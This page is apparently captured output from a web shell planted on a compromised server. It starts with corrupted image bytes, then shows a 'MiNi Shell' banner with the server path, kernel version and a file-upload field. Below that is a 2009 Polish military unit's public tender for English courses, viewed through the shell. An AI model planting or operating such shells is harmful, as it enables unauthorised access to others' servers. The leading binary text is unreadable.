JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/2448-N-2009.html

<p class="kh_header"><b>Brodnica: 1.Wykonanie usługi szkoleniowej z zakresu  kursu języka angielskiego w łącznej liczbie czterech (4) kursów językowych na I , II poziomie zaawansowania, przeprowadzenia cyklu zajęć doskonalących i przygotowujących do egzaminów eksternistycznych oraz  zabezpieczenie materiałów szkoleniowych (pomocy naukowych)</b><br>
<b>Numer ogłoszenia: 2448 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 3537 Brodnica , ul. Czwartaków 1, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 056 4918900, 4918719, faks 0-56 4918613.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Wykonanie usługi szkoleniowej z zakresu  kursu języka angielskiego w łącznej liczbie czterech (4) kursów językowych na I , II poziomie zaawansowania, przeprowadzenia cyklu zajęć doskonalących i przygotowujących do egzaminów eksternistycznych oraz  zabezpieczenie materiałów szkoleniowych (pomocy naukowych).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.      Termin przeprowadzenia dwóch kursów językowych równolegle ustalony zostaje na okres:
a.)	poziom 1: 4 luty 2009 r. - 29 maj 2009 r.
b.)	poziom 2: 4 luty 2009 r. - 24 czerwiec 2009 r.
2.	Termin przeprowadzenia dwóch kursów językowych równolegle ustalony zostaje na okres:
c.)	poziom 1: 1 wrzesień 2009 r. - 16 grudzień 2009 r.
d.)	poziom 2: 1 wrzesień 2009 r. - 20 styczeń 2010 r.
3.	Kurs językowy - poziom 1 - przeprowadzony zostanie w liczbie 500 godz. dydaktycznych w systemie szkolenia stacjonarnego.
4.	Kurs językowy - poziom 2 - przeprowadzony zostanie w liczbie 635 godz. dydaktycznych w systemie szkolenia stacjonarnego.
5.	Zajęcia z kursu na poziomie 1 przeprowadzone zostaną w dniach od poniedziałku do piątku po 6 godzin dydaktycznych dziennie. Ostatnie 14 dni zajęć przeprowadzone będą po 7 godz. dydaktycznych dziennie.
6.	Zajęcia z kursu na poziomie 2 przeprowadzone zostaną w dniach od poniedziałku do czwartku po 7 godzin dydaktycznych dziennie, w piątki po 6 lub 7 godz. dziennie.
7.	Grupa szkoleniowa dla każdego z kursów zostaje ustalona w liczbie do 15 słuchaczy.
8.	Zajęcia przeprowadzone zostaną na terenie miasta Brodnicy, a Wykonawca zapewni we własnym zakresie i na koszt własny bazę szkoleniowo - dydaktyczną.
9.	Wykonawca dla realizacji zamówienia zapewni na każdą z edycji kursu językowego minimum dwóch lektorów języka angielskiego -  absolwentów anglistyki, lingwistyki stosowanej o specjalności nauczycielskiej oraz kolegiów nauczycielskich lub posiadających tytuł mgr filologii angielskiej lub tytułami licencjata filologii angielskiej - z co najmniej dwuletnim doświadczeniem zawodowym.
10.	Wykonawca zapewni dla każdej z edycji kursu językowego udział w realizacji zamówienia (Neative speaker) w liczbie 80 godzin w każdym z kursów.
11.	Każdy kurs zostanie przeprowadzony zgodnie ze standardami STANAG 6001.
12.	W zakresie cyklu zajęć przygotowujących do egzaminów eksternistycznych na poziomie 1 Wykonawca zobowiązuje się przeprowadzić dwa (2) razy w roku w miesiącach luty 2009 r., listopad 2009 r. kurs w wymiarze maksymalnym 140 godz. dydaktycznych każdy. 
13.	W zakresie cyklu zajęć przygotowujących do egzaminów eksternistycznych na poziomie 2 Wykonawca zobowiązuje się przeprowadzić dwa (2) razy w roku w miesiącach luty 2009 r., listopad 2009 r. kurs w wymiarze maksymalnym 140 godz. dydaktycznych każdy.
14.	W zakresie cyklu zajęć doskonalących na poziomie 2 Wykonawca zobowiązuje się przeprowadzić w miesiącach marzec 2009 r. i listopad 2009 r. kurs w wymiarze maksymalnym 80 godz. dydaktycznych każdy.
15.	W zakresie cyklu zajęć doskonalących na poziomie 3 Wykonawca zobowiązuje się przeprowadzić w miesiącach marzec 2009 r. i listopad 2009 r. kurs w wymiarze maksymalnym 80 godz. dydaktycznych każdy.
16.	Zamawiający zastrzega sobie prawo do ograniczenia liczby godzin zajęć doskonalących i przygotowujących do egzaminów eksternistycznych na wszystkich poziomach kształcenia z powodu mniejszych potrzeb Zamawiającego.
17.	Wykonawca zobowiązuje się dostarczyć, zapewnić do 30 nowych kompletów materiałów szkoleniowych (książka, ćwiczenia) dla kursu językowego na poziomie I oraz do 30 nowych kompletów materiałów szkoleniowych (książka, ćwiczenia) stosownie do liczby uczestników kursu językowego na poziomie II.
18.	Wykonawca złoży Zamawiającemu w terminie 14 dni od podpisania umowy pisemny program szkolenia, który zostanie opracowany dla każdej grupy szkoleniowej indywidualnie w oparciu o Ramowy i szczegółowy program nauczania języka angielskiego w Wojskach Lądowych
19.	W celu zakwalifikowania kandydatów na poszczególne poziomy zaawansowania kursu Wykonawca przeprowadzi test kwalifikujący z zakresu znajomości j. angielskiego. 
20.	Zamawiający wymaga obowiązkowego uczestniczenia nauczycieli języka angielskiego wykonawcy w kursach szkoleniowych i metodycznych organizowanych przez resort obrony oraz w egzaminach resortowych na terenie kraju.
21.	Zamawiający dopuszcza możliwość zmiany umowy wynikającej z rozstrzygniętego postępowania, polegającej na zmianie terminów zajęć przygotowujących do egzaminów eksternistycznych na poziomie 1 i 2 oraz zajęć doskonalących na poziomie 2 i 3 w przypadku kolidowania tych terminów z terminami udziału szkolących się żołnierzy w obowiązkowych manewrach wojskowych.
22.	Zamawiający dopuszcza możliwość zmiany umowy wynikającej z rozstrzygniętego postępowania, polegającej na zmianie liczby kursów stacjonarnych lub zmiany poziomu kursu w sytuacji braku kandydatów na uczestników kursu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 22.11.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych: 
a.)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b.) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c.) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d.)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.(art.24 ust. 1 i ust. 2 ustawy p.z.p.).
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły /spełnia - nie spełnia/ w oparciu o dokumenty lub oświadczenia wymienione w pkt IX SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia w/w warunki. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
3. Z ubiegania się o udzielenie zamówienia publicznego wyklucza  się:
1.	Wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 ustawy - Prawo zamówień publicznych.
2.	Wykonawców, którzy wykonywali czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, z wyjątkiem autorów miejscowych planów zagospodarowania przestrzennego, jeżeli przedmiotem postępowania o udzielenie zamówienia są prace projektowe wynikające z miejscowych planów zagospodarowania przestrzennego, sporządzonych przez tych autorów
3.	Wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania
4.	Wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków
5.	Wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:

1.	Formularz ofertowy z wykorzystaniem wzoru - wg załącznika Nr 1 do SIWZ.
2.	Oświadczenie w trybie art. 22 ust.1-3, art. 24 ust. 1 pkt 1-9 oraz art. 24 ust 2 pkt 1 na podstawie ustawy  z dnia 29 stycznia 2004r z poźn. zmianami - Prawo zamówień publicznych, z wykorzystaniem wzoru wg załącznika Nr 2 do SIWZ.
3.	Arkusz cenowo-asortymentowy - wg załącznika Nr 3 do SIWZ.
4.	Wykaz wykonanych w okresie ostatnich trzech lat minimum 3 usług przedmiotowo zbieżnych z przedmiotem zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, dat wykonania i odbiorców oraz załączenia dokumentów (referencje) potwierdzających, że usługi te zostały wykonane należycie. W tym usługi zbieżne przedmiotowo wykonane lub wykonywane w Jednostkach Wojskowych - wg załącznika Nr 4 do SIWZ. 
5.	Oświadczenie Wykonawcy o dysponowaniu sześcioma salami szkoleniowo - dydaktycznymi na terenie miasta Brodnicy przez cały okres trwania umowy, przystosowaną do prowadzenia zajęć z zakresu nauki języka angielskiego - wg załącznika Nr 5 do SIWZ. 
6.	Wykaz lektorów, którzy będą wykonywać zamówienie wraz z informacjami na temat ich doświadczenia (co najmniej dwuletnie) i kwalifikacji niezbędnych do wykonania zamówienia oraz oświadczenie o dysponowaniu osobą native speaker wraz z kserokopiami dyplomów magisterskich, licencjata lub innych dokumentów potwierdzających wykształcenie - wg załącznika Nr 6 do SIWZ,
7.	Zaparafowany projekt umowy - wg załącznika Nr 7 do SIWZ.
8.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.biuletyn.wp.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3537 Brodnica ul. Czwartaków 1 ,87-300 Brodnica 
na wniosek bezpośrednio w siedzibie lub drogą pocztową lub drogą elektroniczną: zp.jw3537.brodnica@wp.pl lub faks 056-49-18-613.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 10:00, miejsce: Jednostka Wojskowa 3537 Brodnica ul. Czwartaków 1 ,87-300 Brodnica.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com